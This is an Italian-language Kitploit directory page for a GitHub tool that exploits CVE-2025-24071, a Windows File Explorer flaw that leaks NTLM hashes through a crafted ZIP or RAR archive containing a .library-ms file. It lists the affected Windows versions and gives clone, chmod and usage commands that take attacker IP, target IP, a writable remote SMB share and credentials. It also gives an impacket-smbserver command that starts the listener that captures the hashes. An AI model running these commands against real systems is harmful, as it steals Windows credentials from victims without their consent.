Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24071 — Vulnerabilità di spoofing di Esplora file di Windows - CVE-2025-24071 | Kitploit
Strumenti/GitHubGitHub/f4dee-backup/cve-2025-24071
Password CrackingAnalisi delle VulnerabilitàExploitEsfiltrazione DatiSicurezza di Rete
GitHubf4dee-backup/cve-2025-24071

CVE-2025-24071

Vulnerabilità di spoofing di Esplora file di Windows - CVE-2025-24071

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24071

Vulnerabilità di spoofing di Windows File Explorer - CVE-2025-24071

Perdita dell'hash NTLM di Windows tramite l'estrazione di un file ZIP o RAR manipolato e sfruttando una vulnerabilità nella gestione dei file .library-ms (un tipo di file utilizzato da Windows per specificare librerie e connessioni di rete).

Versioni interessate

Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows Server 2025 (Server Core installation) Windows Server 2025 Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2016 (Server Core installation) Windows Server 2016 Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 for 32-bit Systems Windows 11 Version 24H2 for x64-based Systems Windows 11 Version 24H2 for ARM64-based Systems Windows Server 2022, 23H2 Edition (Server Core installation) Windows 11 Version 23H2 for x64-based Systems Windows 11 Version 23H2 for ARM64-based Systems Windows 10 Version 22H2 for 32-bit Systems Windows 10 Version 22H2 for ARM64-based Systems Windows 10 Version 22H2 for x64-based Systems Windows 11 Version 22H2 for x64-based Systems Windows 11 Version 22H2 for ARM64-based Systems Windows 10 Version 21H2 for x64-based Systems Windows 10 Version 21H2 for ARM64-based Systems Windows 10 Version 21H2 for 32-bit Systems Windows Server 2022 (Server Core installation) Windows Server 2022 Windows Server 2019 (Server Core installation) Windows Server 2019

Installazione:

root@kitploit:~
git clone https://github.com/f4dee-backup/CVE-2025-24071
root@kitploit:~
cd CVE-2025-24071
root@kitploit:~
chmod +x CVE-2025-24071.sh

Pannello di aiuto:

root@kitploit:~
./CVE-2025-24071.sh -h
	-i) Your IP address
	-t) Target IP
	-d) A remote SMB share with write permissions (e.g.) C, ADMIN, IPC, SYSVOL, etc) 
	-u) Username
	-p) Password
	-h) Display this help panel

Utilizzo:

root@kitploit:~
./CVE-2025-24071.sh -i "YOUR_IP" -t "TARGET_IP" -d "DIRECTORY_WRITE_REMOTE" -u "USER" -p "PASSWORD"

Avvia il server SMB:

root@kitploit:~
impacket-smbserver smbFolder $(pwd) -smb2support
Scarica lo strumento